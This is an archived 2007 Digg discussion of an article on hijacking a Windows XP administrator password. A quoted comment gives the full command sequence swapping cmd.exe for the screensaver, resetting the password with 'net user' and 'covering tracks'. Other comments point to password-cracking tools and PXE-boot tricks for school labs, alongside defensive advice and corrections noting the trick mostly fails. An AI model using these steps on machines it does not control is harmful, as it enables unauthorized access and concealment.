digg

Join DiggAbout

Discover the best of the web!
Learn more about Digg by taking the tour.

How To Hack a Windows XP Admin Password

internetbusinessdaily.net — Here is exactly how to hack a Windows XP Admin Password and not get caught. Have fun.

Bury
show profanity settings
expand all
  • subgeniusd, on 10/12/2007, -6/+13I also changed the admin name to something long and strange so you still can't log on.
    • Bigbro69, on 10/12/2007, -1/+34Not that you can type.. 'net user' or anything to find it out.
    • skyshock21, on 10/12/2007, -5/+60A) If you have access to System32, you already have admin access
      B) Corrrect me if I'm wrong, but this only works on Win2K machines as there is a patch for XP that corrects this.

      Marked as LAME.
    • hammydude, on 10/12/2007, -33/+25http://www.duggmirror.com
    • TigonLiger, on 10/12/2007, -0/+10Marked as inaccurate. Unless you already have admin rights, you'll get "access denied" when you try to create a dir inside system32. If you can create a dir in system32 then you can probably already do whatever you want on the system anyway. Pointless and inaccurate.
    • f3l1x, on 10/12/2007, -0/+0I do not see how you wont get caught... Pretty bold statement.

      This is just like adding explorer (or cmd) to an "at" job then closing your shell and waiting one minute.

      I dont mean to talk it down.. Its all fun stuff and worth the digg.. I just would not say "you wont get caught".
  • SmokeN-DC, on 10/12/2007, -3/+24the main problem with this is most no admin users do not have access to the system32 directory

    I need to check this any one know if this is correct?
    • downlo, on 10/12/2007, -5/+18Not really since a Linux LiveCD will be able to mount the NTFS drive and monkey with the SAM files. In all honesty the only way to prevent this is disabling all boot devices except the HDD and passwording the BIOS.
    • merreborn, on 10/12/2007, -1/+90"In all honesty the only way to prevent this is disabling all boot devices except the HDD and passwording the BIOS."

      Even then you can either just clear the BIOS, or take the drive out and put it in another system.

      If you've got physical access to a PC, it's already compromised.
    • MasterChi, on 10/12/2007, -26/+6Thats why you enable "Lock Case" in the BIOS and you can't take the drive out. Also how will you clear the BIOS if 1. you don't have admin access to install programs and 2. you can't get inside the case to pull the jumper. True you could still manually get in the case but the time it takes is a bit and the fact that you need the correct HEX driver to loosen those screws so.....
    • foxhoundadmin, on 10/12/2007, -6/+17i like the one where they blow up the truck.
    • vertinox, on 10/12/2007, -8/+4@"True you could still manually get in the case but the time it takes is a bit and the fact that you need the correct HEX driver to loosen those screws so....."

      Nothing a pair of players, wirecutters, flathead screwdriver, and a hammer would resolve.

      You didn't want the case back in one piece right?
    • n00tz, on 10/12/2007, -1/+29"Thats why you enable "Lock Case" in the BIOS and you can't take the drive out. Also how will you clear the BIOS if 1. you don't have admin access to install programs and 2. you can't get inside the case to pull the jumper. True you could still manually get in the case but the time it takes is a bit and the fact that you need the correct HEX driver to loosen those screws so....."

      You must be one of those 'A+ Certified' computer users that have never spent a day inside the computer, if you're even certified. Most new computers (Dell especially) don't take anything more than pushing a button to get inside the case. Once inside the case it doesn't take anything more than popping the BIOS battery out of the motherboard and unplugging the power cord (and sometimes hit the power button to discharge any of the capacitors on the motherboard) to reset the BIOS.

      If that was even an issue, I then insert my Linux bootable CD, or USB Flash drive and boot to a linux kernel: mount NTFS. manipulate SAM. reboot. DING! FRIES ARE DONE.

      BTW, no digg. old news.
    • ernkush, on 10/12/2007, -0/+4@merreborn

      You are right, but under most circumstances you could also lock your case and encrypt your hdd when you turn the computer off. It would take far too long for a potential cracker to break the system for him not be noticed.
    • Ahnteis, on 10/12/2007, -0/+5That's why you restrict physical access to your server. If you can get to it to boot it to linux, you can just put a hardware keylogger on the back and steal the admin key, or any number of other obvious "hacks".

      Physical security is as important and software security.
    • ElliotShoe, on 10/12/2007, -3/+2ROFL @ MasterChi

      Props to n00tz
    • piratebill, on 10/12/2007, -2/+3or just buy a lock for your case and set only the hard drive to boot. Password protect the bios as well.

      link for case lock
      http://www.cyberguys.com/templates/searchdetail.asp?ProductID=4112
    • stevetures, on 10/12/2007, -0/+4The way to foil the Linux LiveCD / LiveFloppy is to use EFS (encryption) on the local admin account. They can change the password hash but they won't be able use the new hash to decrypt any of the profile contents, and the login will fail.

      You could probably beat this if you use a password cracker, and not a hash replacer. Beating the password cracker involves disabling lanman hashes (using only NTLMv2) and using a strong password.
    • MasterChi, on 10/12/2007, -9/+0@nootz - you never seen a computer have you? Push a button lol thats great...whats the whole point of a locked case when all you have to do IS PUSH A BUTTON ? freaking idiot. I already explained how to clear the BIOS once inside the case so why did you repeat me ? Also how could you boot from CD/Flash once its all disabled in the BIOS. You fools really don't read do you, just like to comment on nonsense. Get a computer and learn something and stop posting on your PSP or whatever nonsensical device you have.
  • Airlines007, on 10/12/2007, -12/+0thats why you copy the temphack back in while you are in the admins account
  • Andrew916, on 10/12/2007, -11/+4If you can move these files you already have administrative access. If you can't move these files you will need to do it though a boot disk. This used to be easy when all of the computers were using fat32 by default. Now that they are using NTFS, things are more difficult.

    Anyway, thanks for the useless article. I'm glad to see you tried it before you posted it.
  • AngryBacon, on 10/12/2007, -19/+19http://duggmirror.com
  • adidos, on 10/12/2007, -24/+3I think you meant http://duggmirror.com/ - but it still doesn't load correctly...ugh. Get a better webhost!
  • 2012, on 10/12/2007, -5/+23"This Account Has Exceeded Its CPU Quota" whatever was there, isn't anymore.
    • ImTheDarkcyde, on 10/12/2007, -1/+27just do a google, literally nine hundred thousand identical tutorials exist
    • radu5er, on 10/12/2007, -0/+1@ ImTheDarkcyde

      "just do a google, literally nine hundred thousand identical tutorials exist"

      Absolutely!

      Only people who are not adept at "The Google" ;) don't know how easily bios and windows passwords can be cracked. If an individual has physical access to the machine, you are basically had. THE major part of system security is to limit access to the hardware and any system admin worth his salt knows this.
  • vinbob, on 10/12/2007, -2/+16If you're physically at the PC just boot from a UBCD and change the admin password...

    http://www.ultimatebootcd.com
    • vinbob, on 10/12/2007, -1/+4BTW this can also reactivate locked admin accounts too.
    • lustre, on 10/12/2007, -1/+29All bets are off if someone has physical access to the machine. Any machine. Any OS.
    • billyboobs34, on 10/12/2007, -2/+3ntpasswd is smaller and faster
    • dicerandom, on 10/12/2007, -4/+3@lustre:

      Unless you have an encrypted root filesystem, that is.

      http://www.linuxjournal.com/article/7743
    • dfndoe, on 10/12/2007, -0/+6Unless your machine is part of a domain... If you use the UBCD to get admin you need to wipe the domain key which will break the domain relationship and then the real admin will know you monkied with it.... YMMV..
    • bryhhh, on 10/12/2007, -0/+3@dfndoe

      Not true, you can reset the admin password without breaking the domain membership. In fact, I've never heard of this happening and this is a very common practice (for legitimate reasons) where I work.
    • Ahnteis, on 10/12/2007, -0/+6If you change the password, they'll know you were in anyway.
    • shalex, on 10/12/2007, -0/+0Try to clear CMOS password of my ThinkPad T-series (2-levels BIOS passwords) and then mount my ntfs-formatted hdd, which is encrypted with Pointsec (http://www.pointsec.com/products/laptop/)

      I bet you can't even get through BIOS part.
  • chubbymidget, on 10/12/2007, -3/+46Followed by how to get your hosted account suspended!

  • ahill7, on 10/12/2007, -2/+6People should stop digging a story that doesn't even exist. Plus like its been said, not really a new idea.
  • teh_toaster, on 10/12/2007, -4/+36Article Text:

    How to Hack a Window XP Admins Password
    November 2nd, 2006 by Quinn Zerfas

    This is a cool little trick I’ve picked up in my travels and decided to share it with you fine and ethical individuals =). Log in and go to your DOS command prompt and enter these commands exactly:

    cd
    cdwindowssystem32
    mkdir temphack
    copy logon.scr temphacklogon.scr
    copy cmd.exe temphackcmd.exe
    del logon.scr
    rename cmd.exe logon.scr
    exit

    So what you just told windows to backup is the command program and the screen saver file. Then you edited the settings so when windows loads the screen saver, you will get an unprotected dos prompt without logging in. When this appears enter this command that’s in parenthesis (net user password). So if the admin user name is Doug and you want the password 1234 then you would enter “net user Doug 1234″ and now you’ve changed the admin password to 1234. Log in, do what you want to do, copy the contents of temphack back into system32 to cover your tracks.
    • boberto, on 10/12/2007, -3/+59Cover your tracks?

      Yeah, they won't notice their admin password has changed or anything.
      • cred911, on 10/29/2007, -0/+0not working... access denied :( can't chang password.. net user administrator * :( without login as power user :( :(
    • ahill7, on 10/12/2007, -17/+2isn't this the same as hitting F8 at boot time and selecting SafeMode with Command Prompt?

      I wish I could bury again.
    • gblackbox, on 10/12/2007, -3/+3Assuming we "enter these commands exactly", whats the purpose of the temphack directory if you never copy anything into it?

      Strike that, I just realized for some reason your "" are missing.
      • krishna88, on 01/05/2008, -0/+0hey...the command is rite....he just left out a space....it is "COPY LOGON.SCR TEMPHACK LOGON.SCR" so that it gets copied to the temphack folder.
  • thestorey, on 10/12/2007, -0/+37ophcrack live cd

    http://ophcrack.sourceforge.net/
    • Neolit, on 10/12/2007, -0/+7a single most useful link in this post.
      Tried ophcrack. Works as a charm. It will tell you all passwords on the system unless they are really complex... IT is also a very useful tool to test your system password. If ophcrack gets it - change it, 'cos its no good :-)
      The point is to find out the password not to change it.
      If you wish to change the password then just use ERD 2005 or up.
    • BuddhaChu, on 10/12/2007, -7/+4rainbowcrack > ophcrack (more rainbow tables used therefore more passwords cracked)

      http://www.rainbowcrack.com/
    • Tiak, on 10/12/2007, -4/+2Or the ever-classic http://s-t-d.org/ it has pleanty of other uses the ones you advertise don't, but of course lacks the more rarely used cracking abilities.
    • jamend, on 10/12/2007, -0/+5I especially like Hak5's http://sys9five.ath.cx:8080/hak5rtables/, which gives you online access to all-character rainbow tables (not 100% complete but close), so you just paste in a hash and it gives you the password. You can use pwdump6 (http://www.foofus.net/fizzgig/pwdump/, pwdump.exe in PwDumpRelease) to get the contents of the SAM hash file from within Windows and without a reboot.

      Also, to help protect yourself from this attack, you can disable LanManager password hashes (which are on by default in XP) by going to HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Lsa in the registry, creating a new DWORD value called "NoLMHash", and giving it a value of 1.

      PS: The advantage of finding the password instead of replacing it as per the article (whos instructions don't work on am up-to-date 2K/XP system anyways) is that you will be able to access EFS-encrypted files, and the administrator won't notice that you got access in the first place because the password isn't changed.
    • Providence, on 10/12/2007, -1/+2Tried ophcrack on my local. Works flawlessly (even includes a helpfile, lol). Took less than 5 minutes to get it :-/

      Now lemme try this on my dual booted laptop....See if I can crack the windows pw from Linux. That should be fun.
  • Pseudo98, on 10/12/2007, -13/+6Pathetic, poorly researched and inaccurate
    • klawz, on 10/12/2007, -1/+8actually it was accurate, back in 1997-1998
    • Drull, on 10/12/2007, -1/+5Uh, you were using WINDOWS XP back in 97?

      Not a man, but a god!
  • mhaluza, on 10/12/2007, -2/+10 find yourself a copy of ERD commander on a P2P network. Its a bootable live CD that can change Windows admin and user passwords as well as many other techie features (disk wipe, data backup, network access...etc.)
    this article is too dirty of a hack compared to the dozens of software applications like the one mentioned that can do that and much more
    • jimmiejaz, on 10/12/2007, -2/+1ERD is great, it might be a great shame sysinternals was bought by MS, they may stop producing ERD.
  • landmonster, on 10/12/2007, -12/+1This was on here months ago. What a load of *****. I hate whoever posted this.
  • zodiacal, on 10/12/2007, -1/+3and it will prevent anyone from ever reading encrypted files
  • spac3m0nk3y, on 10/12/2007, -3/+5Just use that Linux utility thingy: http://home.eunet.no/pnordahl/ntpasswd/bootdisk.html
  • willgonz, on 10/12/2007, -6/+6You can do this with the AT Command. The AT command runs all it's passwords with NT AUTHORITYSYSTEM.

    Get to a command prompt.
    type AT /interactive cmd.exe

    Example:
    C:> at 1:43pm /interactive cmd.exe

    Wait for time to come and a command prompt will come up. Everything from that point on has elevated privileges. Every program you run has the elevated privileges. Handy if you need to change permissions to registry keys.
    • dioscaido, on 10/12/2007, -4/+6Of course, you need to already have Administrator privileges to schedule the job... so what's the point?
    • bryan986, on 10/12/2007, -1/+9This doesn't always work, many times you will just get an "Access denied" message when trying to use the "at" command as a limited user account
    • fr0z3nph03n1x, on 10/12/2007, -1/+8If you have AT ability already, the admin did something wrong....
  • Legolover64, on 10/12/2007, -2/+2And if you're at a computer where 1) The BIOS is locked, 2) The command prompt isn't accessible and 3) The screensaver doesn't turn on, are you screwed? I'm in this situation every day, but accessing the drives is out of the question (computer lab, heh), but I'd still like to possible mess around...

    Any suggestions?
    • ahill7, on 10/12/2007, -4/+2Depends if you can get on the same LAN with another machine and run a Knoppix or other Linux that has terminal services so you can boot over the network (PXE) (I know our on-campus labs are all Dells and you can easily hit F12 to go to that "temporary" boot selection screen).
  • SpookyET, on 10/12/2007, -2/+25How come these "knowledgeable" idiots do not know 5 years later that "Command Prompt" is not DOS? XP is not built on top of DOS. It's not 9x.

    Is DOS still there? Yes, for compatibility reasons. Type "command.com" in Run to get to DOS. CMD.exe is not DOS.
  • hammydude, on 10/12/2007, -11/+1www.duggmirror.com
  • iAlex, on 10/12/2007, -3/+5Bluehost + Digg = not good. Bluehost seem to be a bad host.
  • Crazyiodudo, on 10/12/2007, -3/+18Wow, how many more duggmirror comments can you guys put?

    We get it.
  • Jarasmen, on 10/12/2007, -9/+5If only I could bury this... Can someone finally fix the problem with the bury button in Opera 9.02 please?
    • DeusMachinae, on 10/12/2007, -10/+6No.
    • SpookyET, on 10/12/2007, -2/+5Use shift + arrow keys to navigate using the keyboard in Opera and press enter.
    • Jarasmen, on 10/12/2007, -1/+2Great, it works! Thanks!
    • cquinnd, on 10/12/2007, -0/+1Yes, SpookyET, thank you for that tip.
  • anomalya, on 10/12/2007, -1/+2if you change the pass then they know someones was messing with it, better to just get the pass, with ophcrack
  • boneill428, on 10/12/2007, -0/+16i miss the days of windows 95 where kids thought they were "hacking" when they hit the cancel button at the login screen
  • eXCubed, on 10/12/2007, -4/+1If you have sufficient rights to muck with files in the Windows directory, you're probably already an admin. Either that or the disk is formatted using FAT which is a bad idea.
  • weedian, on 10/12/2007, -5/+0Its not like it anything special.

    This is like a script kiddie thinking he's a Leet Haxor
  • ivanmarsh, on 10/12/2007, -1/+5Lame! A hack that requires you to be logged into the machine to set up the hack isn't a hack. If you're already logged into the machine what do you need the hack for?
  • BostonMark, on 10/12/2007, -6/+1As others have said before me:
    Start > Run > "cmd" [Enter]
    net user Administrator [YOUR-NEW-PASSWORD]

    I wrote about this a long time ago:
    http://www.allthingsmarked.com/2006/08/21/change-your-xp-password-via-the-command-line/
  • unrealmp3, on 10/12/2007, -5/+0If the PXE boot is still active on the desktop computer, bring a laptop and a crossover cable, and "remote boot" the local computer with another OS from the laptop ;)
    • repruhsent, on 10/12/2007, -0/+1...and since the laptop won't get you any further past security anyway, so this is totally useless and stupid, just like the "hack" in the article.
  • johnstar, on 10/12/2007, -7/+3ophcrack ownz joor box MUHAHAHAHAHAHAHAH!
  • ianmurrays, on 10/12/2007, -2/+3you really need administrator or system privileges to access system32, so what's the point??
  • laxmaniac3773, on 10/12/2007, -1/+5if your logged in as an admin but you wanna have some fun with the other people logged into the computer then type
    control userpasswords2
    then you can reset passwords all day long if you like
    heck, you can even remove whole user accounts with the click of a button. no questions asked!
  • fubes2000, on 10/12/2007, -1/+1why isn't duggmirror working for me on this? All I get is the fancy banner and stuff from the top of the page, but no text.

    Anyone have this problem?
  • dave8555, on 10/12/2007, -0/+2lame and assumes that the admin of the computer has put no security in place.
  • nytsua, on 10/12/2007, -0/+3marked as lame... hacking the admin password when you already have to have admin privileges to do the hack... not hacking.
  • neosublime, on 10/12/2007, -0/+1If you're gonna go as far as to reset the admin password, then you might as well use something like the "Trinity Rescue Kit".

    http://trinityhome.org/Home/blog.php?blog_cat_id=2&b_node=2

    Finally a newer version than the one I still keep stored away in my back pack.
  • XPMasterGuru, on 10/12/2007, -0/+0Should we discuss Group Policy Settings?
  • repruhsent, on 10/12/2007, -0/+1This would only work for any user if you formatted the filesystem that stores %windir% as FAT32; otherwise, you need to be a member of the Administrators group or some other group with write access to %windir% et al.

    In other words, this is totally useless.
  • moonwell, on 10/12/2007, -0/+1yeah repru knows the answer, so why don't we put this to the other windows craps into the spam.
  • grumpyrain, on 10/12/2007, -0/+2Just like the past thousand of these hacks on digg, you need administration privilleges to start with (if you plan on putting anything inside system32 or using AT). Of course you could boot a live CD and change SAM yourself, but then again the same hack would work on any OS. No physical control of machine = no chance.

    / Inaccuracte
  • ThinkFr33ly, on 10/12/2007, -0/+3Wow, this is stupid.

    First, there is no such thing as a "hack" that FIRST requires you to have admin access.

    Second, any admin who cares about their machine's security as security event logging on. This means that any changes to security leave an event in the event log. And event which, even if you delete it, leaves another event. In other words, it will tell them exactly who did this.

    Very, very lame.
  • Loki122, on 10/12/2007, -1/+1O the mischief I could cause....
  • MLyzz, on 10/12/2007, -0/+2Sorry kiddies, might work for a typical home machine, not for a college (protected reasonably well) or net login machine. Good luck. Want to crack ANY admin password? Use linux.
  • gnixon70, on 10/12/2007, -0/+1cracking a non active directory windows machine is easy if you can boot from a CD. I've seen a CD that will blank out the admins p/w, add a user name with admin privileges, elevate an existing user. another CD I've seen will give you the password of all the user names on the machine. Of course the best defense against this is to make the CD ROM (and "a" drive) boot after the hard drive and put in a bios password.
  • cRaCKh0rN, on 10/12/2007, -1/+1Ummmm buried as lame.
  • prammy, on 10/12/2007, -0/+3This will only work on machines which use FAT32 as the filesystem.

    On any NTFS based XP machine, you need admin privileges to copy anything to System32.

    Article is inaccurate and author needs to talk to his/her IT dept as to why they format their machines with a FAT32 filesystem.
  • esc27, on 10/12/2007, -0/+1It could be used effectivily with other approaches such as social engineering (e.g. convince the admin to run a program containing a script that does this.)

    This sort of technique (I've used startup scripts myself) is useful for testing things that should run at startup (e.g. (batct) startup scripts (if set to run visible.)) Cause the command prompt to open on startup, and then manually run a startup script from there. Since it is in a cmd window, it will stay open and you can look at its output to find any problems.
  • yahwho, on 10/12/2007, -1/+0First step: Log in!

    Holy cr@p! This made Digg? Talk about lowering standards.
  • Fetching more discussions...
    Show 51 - 68 of 68 discussions
  •  

    Login or register to add a comment

    Create a new account or login to join in the conversation on Digg. You'll also be able to Digg stories to help promote things you like.


© Digg Inc. 2008 — Content posted by Digg users is dedicated to the public domain.
DIGG, DIGG IT, DUGG, DIGG THIS, Digg graphics, logos, designs, page headers, button icons, scripts, and other service names are the trademarks of Digg Inc.